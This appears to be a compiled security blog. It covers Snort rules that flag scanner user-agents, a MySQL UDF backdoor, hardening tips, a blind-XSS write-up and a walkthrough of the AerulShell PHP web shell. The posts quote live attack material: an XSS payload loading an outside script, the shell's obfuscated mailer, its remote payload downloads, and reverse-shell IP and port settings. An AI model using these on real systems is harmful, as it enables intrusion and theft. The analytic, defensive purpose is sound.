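            return "221 2.0.0 Bye"
        return "502 5.5.2 Error: command not recognized"


def send_message(server, helo, sender, rcpt, subject, body):
    """Drive the exchange from the post as a client; return (accepted, transcript)."""
    body_lines = ["." + l if l.startswith(".") else l for l in body.splitlines()]  # dot-stuff
    script = [f"HELO {helo}", f"MAIL FROM: {sender}", f"RCPT TO: {rcpt}", "DATA",
              f"Subject: {subject}", "", *body_lines, ".", "QUIT"]
    transcript, accepted = [], False
    for line in script:
        reply = server.handle(line)
        transcript.append(f"C: {line}")
        if reply:
            transcript.append(f"S: {reply}")
        if reply.startswith("5"):           # permanent error: give up like a real client
            transcript.append("C: QUIT")
            transcript.append(f"S: {server.handle('QUIT')}")
            return False, transcript
        if line == "." and reply.startswith("250"):
            accepted = True
    return accepted, transcript


if __name__ == "__main__":
    srv = SmtpServer(local_domains=["somewhere.com"])
    ok, transcript = send_message(srv, "thedomain.com", "sendingvictim@thedomain.com",
                                  "spamvictim@somewhere.com", "my subject", "hello there")
    print("\n".join(transcript), "\naccepted:", ok)
```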




Snort Rules Monitoring User-Agents

I think some Snort rules like these could be used to monitor specific user-agents that are often associated with recon, vulnerability scans, and exploits.

WPScan

alert tcp $EXTERNAL_NET any -> $HOME_NET $HTTP_PORTS (sid:xxx; gid:1; flow:established,to_server; content:"WPScan"; http_header; fast_pattern:only; pcre:"/^User\x2dAgent\x3a\x20[^\r\n]*WPScan/Hm"; metadata:service http; msg:"BLACKLIST User-Agent known malicious user-agent string WPScan - vulnerability scanner"; classtype:network-scan; rev:1; )

Wget

alert tcp $EXTERNAL_NET any -> $HOME_NET $HTTP_PORTS (sid:xxx; gid:1; flow:established,to_server; content:"Wget"; http_header; fast_pattern:only; pcre:"/^User\x2dAgent\x3a\x20Wget/Hm"; metadata:service http; msg:"BLACKLIST User-Agent known malicious user-agent string Wget non-browser"; classtype:network-scan; rev:1; )

Synapse

alert tcp $EXTERNAL_NET any -> $HOME_NET $HTTP_PORTS (sid:xxx; gid:1; flow:established,to_server; content:"Synapse"; http_header; fast_pattern:only; pcre:"/^User\x2dAgent\x3a\x20[^\r\n]*Synapse/Hm"; metadata:service http; reference:url,http://www.spambotsecurity.com/forum/viewtopic.php?f=43&t=2876; msg:"BLACKLIST User-Agent known malicious user-agent string Synapse - SQLi IoC"; classtype:network-scan; rev:1; )

SqlMap

alert tcp $EXTERNAL_NET any -> $HOME_NET $HTTP_PORTS (sid:xxx; gid:1; flow:established,to_server; content:"sqlmap"; http_header; fast_pattern:only; pcre:"/^User\x2dAgent\x3a\x20[^\r\n]*sqlmap/Hm"; metadata:service http; reference:url,http://sqlmap.org/; msg:"BLACKLIST User-Agent known malicious user-agent string sqlmap - vulnerability scanner"; classtype:network-scan; rev:1; )

Python

alert tcp $EXTERNAL_NET any -> $HOME_NET $HTTP_PORTS (sid:xxx; gid:1; flow:established,to_server; content:"Python-urllib"; http_header; fast_pattern:only; pcre:"/^User\x2dAgent\x3a\x20Python/Hm"; metadata:service http; msg:"BLACKLIST User-Agent known malicious user-agent string Python non-browser"; classtype:network-scan; rev:3; )

PycURL

alert tcp $EXTERNAL_NET any -> $HOME_NET $HTTP_PORTS (sid:xxx; gid:1; flow:established,to_server; content:"PycURL"; http_header; fast_pattern:only; pcre:"/^User\x2dAgent\x3a\x20[^\r\n]*PycURL/Hm"; metadata:service http; reference:url,http://pycurl.io/; msg:"BLACKLIST User-Agent known malicious user-agent string PycURL - non Browser"; classtype:network-scan; rev:1; )

Paros

alert tcp $EXTERNAL_NET any -> $HOME_NET $HTTP_PORTS (sid:xxx; gid:1; flow:established,to_server; content:"Paros"; http_header; fast_pattern:only; pcre:"/^User\x2dAgent\x3a\x20[^\r\n]*Paros/Hm"; metadata:service http; reference:url,http://sectools.org/tool/paros/; msg:"BLACKLIST User-Agent known malicious user-agent string Paros - vulnerability scanner"; classtype:network-scan; rev:1; )

OpenVAS

alert tcp $EXTERNAL_NET any -> $HOME_NET $HTTP_PORTS (sid:xxx; gid:1; flow:established,to_server; content:"OpenVAS"; http_header; fast_pattern:only; pcre:"/^User\x2dAgent\x3a\x20[^\r\n]*OpenVAS/Hm"; metadata:service http; reference:url,http://www.openvas.org/; msg:"BLACKLIST User-Agent known malicious user-agent string OpenVAS - vulnerability scanner"; classtype:network-scan; rev:2; )

Nmap

alert tcp $EXTERNAL_NET any -> $HOME_NET $HTTP_PORTS (sid:xxx; gid:1; flow:established,to_server; content:"Nmap"; http_header; fast_pattern:only; pcre:"/^User\x2dAgent\x3a\x20[^\r\n]*Nmap/Hm"; metadata:service http; reference:url,https://nmap.org/book/nse.html; msg:"BLACKLIST User-Agent known malicious user-agent string Nmap - scanner"; classtype:network-scan; rev:2; )

Nikto

alert tcp $EXTERNAL_NET any -> $HOME_NET $HTTP_PORTS (sid:xxx; gid:1; flow:established,to_server; content:"Nikto"; http_header; fast_pattern:only; pcre:"/^User\x2dAgent\x3a\x20[^\r\n]*Nikto/Hm"; metadata:service http; reference:url,http://sectools.org/tool/nikto/; msg:"BLACKLIST User-Agent known malicious user-agent string Nikto - vulnerability scanner"; classtype:network-scan; rev:1; )

Kazehakase

alert tcp $EXTERNAL_NET any -> $HOME_NET $HTTP_PORTS (sid:xxx; gid:1; flow:established,to_server; content:"Kazehakase"; http_header; fast_pattern:only; pcre:"/^User\x2dAgent\x3a\x20[^\r\n]*Kazehakase/Hm"; metadata:service http; reference:url,https://en.wikipedia.org/wiki/Kazehakase; msg:"BLACKLIST User-Agent known malicious user-agent string Kazehakase - suspicious browser"; classtype:network-scan; rev:1; )

curl

alert tcp $EXTERNAL_NET any -> $HOME_NET $HTTP_PORTS (sid:xxx; gid:1; flow:established,to_server; content:"curl"; http_header; fast_pattern:only; pcre:"/^User\x2dAgent\x3a\x20[^\r\n]*curl/Hm"; metadata:service http; msg:"BLACKLIST User-Agent known malicious user-agent string curl - non browswer"; classtype:network-scan; rev:1; )
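As an added example that is not part of the original post, the Python below emulates the content + pcre checks of a few of the rules above against constructed HTTP requests. The pcre strings are kept exactly as written in the rules; the /H flag is approximated by running the regex over the raw header block with re.M, and Snort's header normalization and the $EXTERNAL_NET -> $HOME_NET direction are not modeled.

```python
import re

# (msg suffix, content, pcre) copied from the rules above. Snort's content match is
# case-sensitive here (no nocase) and the pcre runs over the header buffer with
# /m, so ^ anchors at the start of each header line.
RULES = [
    ("Wget non-browser", "Wget", r"^User\x2dAgent\x3a\x20Wget"),
    ("sqlmap - vulnerability scanner", "sqlmap", r"^User\x2dAgent\x3a\x20[^\r\n]*sqlmap"),
    ("Python non-browser", "Python-urllib", r"^User\x2dAgent\x3a\x20Python"),
    ("Nikto - vulnerability scanner", "Nikto", r"^User\x2dAgent\x3a\x20[^\r\n]*Nikto"),
    ("curl - non browser", "curl", r"^User\x2dAgent\x3a\x20[^\r\n]*curl"),
]


def split_request(raw: bytes) -> tuple[str, str]:
    """Return (request line, header block) of a raw HTTP request."""
    head = raw.split(b"\r\n\r\n", 1)[0].decode("latin-1")
    request_line, _, headers = head.partition("\r\n")
    return request_line, headers


def matching_rules(raw: bytes) -> list[str]:
    """Names of the rules whose content AND pcre both match the header block."""
    _, headers = split_request(raw)
    hits = []
    for msg, content, pcre in RULES:
        # fast_pattern content first (cheap substring test), then the pcre
        if content in headers and re.search(pcre, headers, re.M):
            hits.append(msg)
    return hits


# Constructed sample requests (not captured traffic).
SAMPLES = {
    "sqlmap": (b"GET /index.php?id=1 HTTP/1.1\r\nHost: shop.example\r\n"
               b"User-Agent: sqlmap/1.0-dev (http://sqlmap.org)\r\nAccept: */*\r\n\r\n"),
    "python_plain": (b"GET /api HTTP/1.1\r\nHost: shop.example\r\n"
                     b"User-Agent: Python-urllib/3.5\r\n\r\n"),
    # content "Python-urllib" is present, but the Python rule's pcre is anchored
    # to a UA that *starts* with "Python", so a browser-looking prefix evades it
    "python_disguised": (b"GET /api HTTP/1.1\r\nHost: shop.example\r\n"
                         b"User-Agent: Mozilla/5.0 (compatible; Python-urllib/3.5)\r\n\r\n"),
    # "curl" appears in a different header: the pcre ties the match to the UA line
    "curl_in_other_header": (b"GET / HTTP/1.1\r\nHost: shop.example\r\n"
                             b"User-Agent: Mozilla/5.0\r\nX-Requested-With: curl\r\n\r\n"),
    "browser": (b"GET / HTTP/1.1\r\nHost: shop.example\r\n"
                b"User-Agent: Mozilla/5.0 (Windows NT 10.0) Firefox/50.0\r\n\r\n"),
}

if __name__ == "__main__":
    for name, raw in SAMPLES.items():
        print(f"{name:22s} -> {matching_rules(raw)}")
```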

MySQL Backdoors in UDFs

Thought this blog post by securusglobal about MySQL backdoors with UDFs was interesting. In short, a UDF is a user-defined function in MySQL. It lets you manipulate column values, for example in a select statement, without putting the non-MySQL logic (such as C/C++ code) inside the select statement itself. Example: select udf_tocelsius(temps.fahrenheit) from temps

But instead of doing something benign like a formula or calculation, an attacker could do something like

char *cmd;
FILE *fp;
strcat(cmd, args->args[i]);
fp = popen(cmd, "r");


This is C code that runs system commands on the operating system (popen() is similar to the system() function), so an attacker could pass in commands that download malware, execute it, etc.

Please note this is not a vulnerability; it is an example of a backdoor persistence method. A lot of things have to be set up a certain way for this to work at all: if the attacker doesn't have the appropriate access, or permissions are locked down tight, it may never work. Interesting nonetheless.

SIEM Implementation (Security Incident and Event Management)

Just thought I'd throw together some items that I've experienced as being critical to the implementation and long-term success of a SIEM.

1.) Staff to manage the Infrastructure (uptime, performance, storage, upgrades)
2.) Staff to administer the SIEM (rule/alert tuning and creation, log sources collection and monitoring)
3.) Staff to monitor and analyze the alerts (ensure you have enough to manage the queue quickly and hit all SLAs)
4.) System Resources (Enough hardware, licenses, etc. so you don't drop logs, and can correlate events quickly, etc.)
5.) Custom Alerts for your Environment (disable most of the defaults, write the rules specific to what should or shouldn't happen in your company)
6.) Constant Tuning of existing Alerts (to ensure analysts are only working on useful alerts and not noisy junk)
7.) Constant Adding/Enhancing of Alerts (as new security trends pop up, quickly add new alerts to capture them)
8.) Add accurate and relevant Intel (don't blindly take free feeds, make sure the intel you gather is accurate and relevant to your environment)
9.) Log Sources Processes (ensure processes exist so whenever a new device, server, or app is brought up it doesn't go-live until you're getting logs)
10.) Document all alerts (generate a history for devices, servers, users, ips, urls, etc. so that analysts have context and don't have to re-invent the wheel)
11.) Data Classification (analysts must know what your sensitive data is and where it resides so they know what they're protecting and when to raise red flags)
12.) Management support (you need managers that show interest and concern for things like alert queues, SLAs, false positive rates, etc. to drive improvement)


It's a lot, but if you have those things it would seem that a SIEM can be a valuable tool in your layered Security!

SiteCore Security Hardening

Thought this security hardening article by Rackspace was useful for those supporting SiteCore environments. To quickly summarize:

1. Deny anonymous users access to key folders (e.g. keep bad guys from doing recon on your admin, config, debug, and other folders)
2. Disable client RSS feeds (this prevents bad guys from getting access to modify or see sensitive data)
3. Secure the file upload functionality (e.g. disable execute permissions, apply a strong and strict filter, etc.)
4. Improve the security of the website folder (e.g. move non-web folders like data and indexes out of the web root)
5. Increase login security (e.g. enable HTTPS and disable auto-complete)
6. Limit access to certain file types (e.g. block access to your configuration files, transformation files, etc.)
7. Protect PhantomJS (e.g. get rid of this tool, it's generally not needed but could be used against you)
8. Protect media requests (e.g. only allow server generated requests to be processed on images)
9. Remove header information from responses sent by your website (e.g. remove response headers to prevent information leakage)


Chrome to Mark HTTP as Insecure

It's exciting to see that Google Chrome will start marking HTTP login pages as insecure in January 2017.

To help users browse the web safely, Chrome indicates connection security with an icon in the address bar. Historically, Chrome has not explicitly labelled HTTP connections as non-secure. Beginning in January 2017 (Chrome 56), we’ll mark HTTP sites that transmit passwords or credit cards as non-secure, as part of a long-term plan to mark all HTTP sites as non-secure.

So I did a quick before & after to show you what it looks like. You can try this yourself by going to chrome://flags and changing "mark non-secure origins as non-secure" from Default to "mark non-secure origins as non-secure".



BEFORE making that change, an HTTP login page looks like this:



AFTER making that change, an HTTP login page looks like this (notice the little red exclamation mark next to the URL):



And if you click the red exclamation mark to see the details, it says:



Why is this a good thing? Because HTTPS does multiple things for you that are critical on the internet. The obvious one is encryption, so your passwords are encrypted and not sent over the internet in plain text. But I've also blogged about how HTTPS gives you more than just encryption: authenticity, integrity, third-party vetting, revocation and more. If you're surfing the internet over HTTP you can't trust it at all, even if it's just a plain website. Why? There could be a man-in-the-middle monitoring your traffic, serving up and injecting code and malware, and you wouldn't even know it.

Blind Cross-site Scripting (BXSS)

Matthew Bryant (@IAmMandatory) wrote a great blog post a bit ago Breaching a CA – Blind Cross-site Scripting (BXSS) in the GeoTrust SSL Operations Panel Using XSS Hunter. It has a pretty cool concept of BXSS (Blind XSS) ( or Blind Cross Site Scripting).

What is XSS?

XSS (or Cross Site Scripting) is a vulnerability in a website where an attacker can inject JavaScript into a user input parameter (perhaps the URL, query string, a cookie, a textbox, etc.). Because the developer did not properly validate that input, when the HTTP response comes back and the page is displayed, the browser mistakenly runs the user-supplied JavaScript. Why is this a problem? If a malicious actor can get you to click a link and run their JavaScript in your browser, they can potentially compromise your browser, your credentials, or even your entire system. They can inject key loggers, malware, etc. Bad stuff.

What is BXSS?

With XSS as defined above you get immediate feedback. With BXSS you don't! I have written about BXSS once before. In short, you submit some malicious XSS input somewhere, but the intent is not to exploit the system you're entering the data into. Instead you're hoping to run JavaScript on a different system that also handles that same data, likely at a later date. Great examples of this are websites that let you rate products and leave comments. If you inject XSS into that comment box, one BXSS outcome is that when the product review moderator views your comment on their internal intranet site from their cubicle, the XSS code executes on that intranet site. As the attacker you're blind: you submitted the payload on the public product page but don't see the result and get no immediate feedback, and you won't know whether it worked until hours or days later when that moderator opens your comment and tries to approve or reject it.

More from Matthew's blog

Matthew used the tool XSS Hunter, which lets you submit XSS payloads and reports whether each one fired, including details like a screenshot of the page, the HTML of the page where it ran, etc. Perfect for BXSS: even though you couldn't see the payload run, XSS Hunter gives you all the details as if you had.

It's an interesting concept too that Matthew mentions "In the world of blind payload testing, context is everything. You may only trigger the vulnerability a single time so you must have as much information as possible if you want to get it fixed." Basically the moderator may only ever moderate or review your comment once. Thus your first payload can't be an alert(1) test! Your first payload has to be the real-deal and it has to work the first time!

To explain Matthew's GeoTrust attack here's a short summary "during my testing I found an unintended vulnerability in GeoTrust’s Operations Panel when a support agent viewed my certificate request information. I woke up one morning with an XSS Hunter payload fire email titled [XSSHunter] XSS Payload Fired On https://ops.geotrust.com/opsdashboard/com.geotrust.presentation.app.ops.services.cancelagedorders.CancelAgedOrders/CancelAgedOrders.jsp in my inbox"

XSS Hunter showed him this code. Notice that data[i].Customer is concatenated straight into the table markup and displayed as HTML without any validation or sanitization.

for(i = 0; i < count; i++){
    table = table + "<tr><td>" + data[i].ID + "</td><td>" + data[i].Product + "</td><td>" + data[i].Customer + "</td><td>" + (data[i]).Date + "</td><td>" + data[i].State + "</td></tr>";
}


So all Matthew had to do was inject the Customer field with this value

"><script src=https://y.vg></script>

And the internal support agent, in his cubicle on the intranet, suddenly loads Matthew's XSS Hunter URL (https://y.vg), which could deliver key loggers, screenshot takers, or whatever other mayhem the attacker wants to inflict.

<tr><td>13785664</td><td>GeoTrust SSL Trial</td><td>"><script src="https://y.vg"></script></td><td>06/06/2016 05:40:04</td><td>Waiting for Whois Approval</td></tr>

To protect against XSS and BXSS you need to perform input validation on all user input, and remember that user input can come from anywhere! Recall my blog post What is the 'input' in input validation? In this case, even the values in an SSL Certificate such as Customer must be considered user input, thus untrusted, and thus they need to be sanitized. Ideally you would set up a regex that whitelists the allowed characters and format, and use a standard XSS prevention library to strip out or encode dangerous characters.
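As an added example (not code from Matthew's post or from GeoTrust's panel), this Python reproduces the panel's row concatenation next to the two defenses just described: an allowlist check on the Customer field at intake, and HTML entity encoding at the point of output. The allowlist is a constructed policy; in the real panel the encoding belongs in the JavaScript that builds the table.

```python
import html
import re

# Allowlist for a Customer/organization name: letters, digits, spaces and the
# punctuation companies actually use. Constructed policy, not GeoTrust's.
CUSTOMER_ALLOWED = re.compile(r"^[A-Za-z0-9 .,&'()-]{1,128}$")

# The row Matthew's payload landed in, values as shown in the post.
ORDER = {
    "ID": 13785664,
    "Product": "GeoTrust SSL Trial",
    "Customer": '"><script src=https://y.vg></script>',
    "Date": "06/06/2016 05:40:04",
    "State": "Waiting for Whois Approval",
}


def validate_customer(value: str) -> bool:
    """Intake check: reject anything outside the allowlist (first layer)."""
    return CUSTOMER_ALLOWED.fullmatch(value) is not None


def render_row_unsafe(order: dict) -> str:
    """Mirrors the panel's concatenation: field values land in the HTML as-is."""
    return ("<tr><td>" + str(order["ID"]) + "</td><td>" + order["Product"]
            + "</td><td>" + order["Customer"] + "</td><td>" + order["Date"]
            + "</td><td>" + order["State"] + "</td></tr>")


def render_row_safe(order: dict) -> str:
    """Same layout, but every value is entity-encoded at output (second layer)."""
    cells = (str(order["ID"]), order["Product"], order["Customer"],
             order["Date"], order["State"])
    return "<tr>" + "".join(f"<td>{html.escape(c, quote=True)}</td>" for c in cells) + "</tr>"


if __name__ == "__main__":
    print("intake accepts payload:", validate_customer(ORDER["Customer"]))
    print(render_row_unsafe(ORDER))
    print(render_row_safe(ORDER))
```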

Friday, September 2, 2016

Intel Assembly Basics: Segment Registers

Intel Assembly Basics

Six 16-bit segment registers:

1.) CS #code segment
2.) DS #data segment
3.) SS #stack segment
4.) ES #extra segment
5.) FS #general purpose segment
6.) GS #general purpose segment


A segment register holds the base address of a segment, so memory in that segment is accessed as an offset from that base. Example:

mov DS:[eax], ebx


This moves the data in ebx into the data segment ... but where exactly? The base address of the data segment plus the value in eax gives you the final address.

Intel Assembly Basics: EIP Register

Intel Assembly Basics

EIP # instruction pointer; points to the next instruction to execute. The goal of most memory-corruption attacks is to control this register.

Intel Assembly Basics: General Purpose Registers

Intel Assembly Basics

Eight general purpose registers:
1.) EAX #can also access hi/lo order 8 bits (AH/AL)
2.) EBX #can also access hi/lo order 8 bits (BH/BL)
3.) ECX #used by many string instructions as a counter, can also access hi/lo order 8 bits (CH/CL)
4.) EDX #can also access hi/lo order 8 bits (DH/DL)
5.) ESI #used by many string instructions as a source pointer, can also access lo order 16 bits (SI)
6.) EDI #used by many string instructions as a destination pointer, can also access lo order 16 bits (DI)
7.) EBP #used in many stack operations, generally contains an address; a wrong address here can crash the app. Can also access lo order 16 bits (BP)
8.) ESP #can also access lo order 16 bits (SP)

Intel Assembly Basics: Opcode & Shell Code

Intel Assembly Basics
return 0;

Could be represented by this

leave
xor eax, eax
ret


which correspond to these CPU opcode bytes:

leave # 0xC9
xor eax, eax # 0x31, 0xC0
ret # 0xC3


Which means if you wanted to create shellcode for the 'return 0' statement in C you'd do the following.

unsigned char shellcode[] = "\xc9\x31\xc0\xc3";
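As an added example (not from the post), here is a small Python decoder and encoder for just these opcodes. It shows how the xor's ModRM byte 0xC0 selects eax for both operands, that ret encodes as 0xC3 while 0xC9 is leave, and how the resulting bytes are rendered as the C array above; the two xor forms (0x31 and 0x33) are the generalization of the single instruction the post shows.

```python
# Register numbers as used in the ModRM reg and r/m fields (32-bit operands).
REG32 = ["eax", "ecx", "edx", "ebx", "esp", "ebp", "esi", "edi"]
# Single-byte opcodes without operands.
ONE_BYTE = {0xC9: "leave", 0xC3: "ret", 0x90: "nop"}


def decode(code: bytes) -> list[str]:
    """Disassemble the supported subset (leave, ret, nop, xor reg, reg)."""
    out, i = [], 0
    while i < len(code):
        op = code[i]
        if op in ONE_BYTE:
            out.append(ONE_BYTE[op])
            i += 1
        elif op in (0x31, 0x33):
            # 0x31 = XOR r/m32, r32 (destination is r/m)
            # 0x33 = XOR r32, r/m32 (destination is reg)
            if i + 1 >= len(code):
                raise ValueError(f"truncated ModRM at offset {i}")
            modrm = code[i + 1]
            mod, reg, rm = modrm >> 6, (modrm >> 3) & 7, modrm & 7
            if mod != 3:  # only register-to-register (mod = 11b) is handled here
                raise ValueError(f"memory operand at offset {i} not supported")
            dst, src = (rm, reg) if op == 0x31 else (reg, rm)
            out.append(f"xor {REG32[dst]}, {REG32[src]}")
            i += 2
        else:
            raise ValueError(f"unknown opcode 0x{op:02x} at offset {i}")
    return out


def assemble(lines: list[str]) -> bytes:
    """Encode the same subset back to bytes (xor always uses the 0x31 form)."""
    byte_for = {v: k for k, v in ONE_BYTE.items()}
    out = bytearray()
    for line in lines:
        mnem, _, operands = line.strip().partition(" ")
        if mnem in byte_for and not operands:
            out.append(byte_for[mnem])
        elif mnem == "xor":
            dst, src = [o.strip() for o in operands.split(",")]
            # mod=11b in the top two bits, source register in reg, destination in r/m
            modrm = (3 << 6) | (REG32.index(src) << 3) | REG32.index(dst)
            out += bytes([0x31, modrm])
        else:
            raise ValueError(f"cannot encode {line!r}")
    return bytes(out)


def as_c_array(code: bytes, name: str = "shellcode") -> str:
    """Render bytes the way the post writes them, as a C char array."""
    return f'unsigned char {name}[] = "' + "".join(f"\\x{b:02x}" for b in code) + '";'


if __name__ == "__main__":
    prog = ["leave", "xor eax, eax", "ret"]
    code = assemble(prog)
    print(as_c_array(code))
    print(decode(code))
```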

Intel Assembly Basics: return 0;

Intel Assembly Basics
return 0;

Could be represented by this

leave # destroys the stack frame
xor eax, eax # sets eax to 0 (a value xored with itself is 0, since each result bit is 1 only when one input bit or the other is 1 but not both; this is shorter and typically faster than mov eax, 0)
ret # returns control back to the calling program

Thursday, September 1, 2016

AerulShell Web Shell Code Walk-Through

This Paste of the AerulShell v.4 appears to be a PHP web shell that an attacker can upload to get backdoor access, letting them compromise and manage your web server without you knowing it.

It's got some interesting features/pieces.

For authentication it requires that the md5 hash of the parameter 'x' posted to the page equals c2b72f86b8ca51642c4a902887830d3e.

$auth_pass = "c2b72f86b8ca51642c4a902887830d3e";
if( ... ( md5($_POST['x']) == $auth_pass ) ) )
{ $_SESSION[md5($_SERVER['HTTP_HOST'])] = true; }


If you look that hash up in an md5 lookup service like this, you see that the password is aerulcyber, so you could log in to it with something like www.hackedsite.com/evilpage.php?x=aerulcyber

Also, if there is a login failure it sends an email to the 'Boss' at root@aerulcyber.biz. How do I know this? On a login failure it calls PrintLogin(), which is deceptively named, as it actually carries some obfuscated code of its own.

function printLogin()
...
$shell_data = "JHZpc2l0Y291bn...;
eval(base64_decode($shell_data));


Which if deobfuscated actually sets a cookie on your browser, counts how many times you've been there, and sends an email with your ip address to the Boss.


$visitcount = $HTTP_COOKIE_VARS["visits"];
...
$visitor = $_SERVER["REMOTE_ADDR"];
...
$body = "Boss, there was an injected target on $target by $visitor";
@mail("root@aerulcyber.biz","http://$target $system by $visitor", "$body");


Also, if you navigate to this page without the 'x' parameter it deceptively looks like an HTTP 404 page not found. But you should notice a textbox and submit button at the bottom. If you enter the password mentioned above into the textbox and hit submit, it logs you into the web shell console.

<html>
...
<title>
404 Not Found
</title>
...
<form method=post>
<address>Apache Server at <?=$_SERVER['HTTP_HOST']?> Port 80<center><input type=password name=x><input type=submit
value=''></center></address>
</form>


Once logged in, passing the 'dl' parameter downloads a file; for example, www.hackedsite.com/evil.php?dl=index.php would download the home page's source.

if(isset($_GET['dl']) && ($_GET['dl'] != "")){
$file = $_GET['dl'];
$filez = @file_get_contents($file);
...echo $filez;


You could delete a file

if(isset($_GET['delete']) && ($_GET['delete'] != ""))
$file = $_GET['delete']; @unlink($file);


You could make a folder

elseif(isset($_GET['mkdir']) && ($_GET['mkdir'] != ""))
$path = $pwd.$_GET['mkdir']; @mkdir($path);


You could get a shell and post commands to it

elseif(isset($_GET['x']) && ($_GET['x'] == 'shell'))
<form action="?y=<?php echo $pwd; ?>&amp;x=shell" method="post">
<table class="cmdbox">
<tr>
<td colspan="2">
<textarea class="output" readonly> <?php if(isset($_POST['submitcmd'])) { echo @exe($_POST['cmd']); } ?> </textarea>


There are also attempts to download exploits, run them, and elevate you to root

$pilih = $_POST['pilih'];
if ( $pilih == 'autoroot1') {
mkdir('auto',0777);
$file = file_get_contents('http://svchost.nazuka.net/a.txt');
$IIIIIIIIl11I = fopen('auto/auto.pl','w');
chmod("auto/auto.pl",0777);
fwrite($IIIIIIIIl11I,$file);
fclose($IIIIIIIIl11I);
print 'autoroot telah diluncurkan Boss....


There are also additional "bonus tools" that the shell downloads and executes, basically pulling raw text off pastebin.

$file = file_get_contents('http://pastebin.com/raw.php?i=gtTLMyya');
$IIIIIIIIl11I = fopen('meter.php','w');

$file = file_get_contents('http://pastebin.com/raw.php?i=ctQsPjpn');
$IIIIIIIIl11I = fopen('wy.php','w');

$file = file_get_contents('http://pastebin.com/raw.php?i=mGSK1EEa');
$IIIIIIIIl11I = fopen('back.php','w');

$file = file_get_contents('http://pastebin.com/raw.php?i=aBHs2nWR');
$IIIIIIIIl11I = fopen('back.pl','w');


You can pull up a reverse shell back to these IP addresses; it even gives the attacker friendly hints/reminders on how to use it.

+--=[ Backconnect Reverse Shell ]=--+
...
Choose Backconnect Command
...
<form method="post" action="">&
...
<option value="back1" > Perl Backconnect </option>
<option value="back2"> Php Backconnect </option>
<option value="back3"> Weevely </option>
<option value="back4"> Php Metasploit </option>
...
edit pada source script back.pl
my $ip = '222.255.167.45';
my $port = '57899';
...
edit pada source script back.php
$ip = '222.255.167.45';
$port = 57899;
...
edit pada source script back.pl
my $ip = '222.255.167.45';
my $port = '57899';
...
edit pada source script meter.php
$ip = '222.255.167.45';
$port = 57899;
...
usage : nc -lvvp 57899


You can upload a file to the hacked web server with a tool of your choice

<th colspan="2">Upload from url</th>
...
<option value="wwget">wget</option>
<option value="wlynx">lynx</option>
<option value="wfread">fread</option>
<option value="wfetch">fetch</optoion>
<option value="wlinks">links</option>
<option value="wget">GET</option>
<option value="wcurl">curl</option>


You can deface the site and tell them why you did it

elseif(isset($_GET['x']) && ($_GET['x'] == 'zone-h')){?>

<input class="inputz" type="text" name="defacer" size="67" value="Aerul Da White-Hkc" /><br> <select class="inputz" name="hackmode">
<option>------------------------------------SELECT-------------------------------------</option>
<option style="background-color: rgb(0, 0, 0);" value="1">known vulnerability (i.e. unpatched system)</option>
<option style="background-color: rgb(0, 0, 0);" value="2" >undisclosed (new) vulnerability</option>
<option style="background-color: rgb(0, 0, 0);" value="3" >configuration / admin. mistake</option>
<option style="background-color: rgb(0, 0, 0);" value="4" >brute force attack</option>
<option style="background-color: rgb(0, 0, 0);" value="5" >social engineering</option>
<option style="background-color: rgb(0, 0, 0);" value="6" >Web Server intrusion</option>
<option style="background-color: rgb(0, 0, 0);" value="7" >Web Server external module intrusion</option>
<option style="background-color: rgb(0, 0, 0);" value="8" >Mail Server intrusion</option>
<option style="background-color: rgb(0, 0, 0);" value="9" >FTP Server intrusion</option>
<option style="background-color: rgb(0, 0, 0);" value="10" >SSH Server intrusion</option>
<option style="background-color: rgb(0, 0, 0);" value="11" >Telnet Server intrusion</option>
<option style="background-color: rgb(0, 0, 0);" value="12" >RPC Server intrusion</option>
<option style="background-color: rgb(0, 0, 0);" value="13" >Shares misconfiguration</option>
<option style="background-color: rgb(0, 0, 0);" value="14" >Other Server intrusion</option>
<option style="background-color: rgb(0, 0, 0);" value="15" >SQL Injection</option>
<option style="background-color: rgb(0, 0, 0);" value="16" >URL Poisoning</option>
<option style="background-color: rgb(0, 0, 0);" value="17" >File Inclusion</option>
<option style="background-color: rgb(0, 0, 0);" value="18" >Other Web Application bug</option>
<option style="background-color: rgb(0, 0, 0);" value="19" >Remote administrative panel access bruteforcing</option>
<option style="background-color: rgb(0, 0, 0);" value="20" >Remote administrative panel access password guessing</option>
<option style="background-color: rgb(0, 0, 0);" value="21" >Remote administrative panel access social engineering</option>
<option style="background-color: rgb(0, 0, 0);" value="22" >Attack against administrator(password stealing/sniffing)</option>
<option style="background-color: rgb(0, 0, 0);" value="23" >Access credentials through Man In the Middle attack</option>
<option style="background-color: rgb(0, 0, 0);" value="24" >Remote service password guessing</option>
<option style="background-color: rgb(0, 0, 0);" value="25" >Remote service password bruteforce</option>
<option style="background-color: rgb(0, 0, 0);" value="26" >Rerouting after attacking the Firewall</option>
<option style="background-color: rgb(0, 0, 0);" value="27" >Rerouting after attacking the Router</option>
<option style="background-color: rgb(0, 0, 0);" value="28" >DNS attack through social engineering</option>
<option style="background-color: rgb(0, 0, 0);" value="29" >DNS attack through cache poisoning</option>
<option style="background-color: rgb(0, 0, 0);" value="30" >Not available</option>
...
<select class="inputz" name="reason">
<option >------------------------------------SELECT-------------------------------------</option>
<option style="background-color: rgb(0, 0, 0);" value="1" >Heh...just for fun!</option>
<option style="background-color: rgb(0, 0, 0);" value="2" >Revenge against that website</option>
<option style="background-color: rgb(0, 0, 0);" value="3" >Political reasons</option>
<option style="background-color: rgb(0, 0, 0);" value="4" >As a challenge</option>
<option style="background-color: rgb(0, 0, 0);" value="5" >I just want to be the best defacer</option>
<option style="background-color: rgb(0, 0, 0);" value="6" >Patriotism</option>
<option style="background-color: rgb(0, 0, 0);" value="7" >Not available</option>


You could launch a port scan on somebody

function sws_port_scan($ip)
{
$list_post = array('80','21','22','2082','25','53','110','443','143');
foreach ($list_post as $o_port)
{
$connect = @fsockopen($ip,$o_port,$errno,$errstr,5);


It can change the Joomla or WordPress administrative passwords

$SQL=@mysql_query("UPDATE jos_users SET username ='".$admin."' WHERE ID = 62") or die(mysql_error());
$SQL=@mysql_query("UPDATE jos_users SET password ='".$pwd."' WHERE ID = 62") or die(mysql_error());
$a4s=@mysql_query("UPDATE wp_users SET user_login ='".$admin."' WHERE ID = 1") or die(mysql_error());
$a4s=@mysql_query("UPDATE wp_users SET user_pass ='".$hash."' WHERE ID = 1") or die(mysql_error());


It can try to brute-force some default passwords

+--==[ Cpanel BruteForce ]==--+

abcd1234
abcdef
acb123
adm1n1strator
adm1nistrator
admin@123
admin1
ADMIN1
admin12
admin123
admin1234
admin123456


There are many more features if you dig deeper into the code. But hopefully the information above gives a good overview of the power and danger of web shells like AerulShell, and a bit more insight into the inner workings and the thought process of the people who write them.

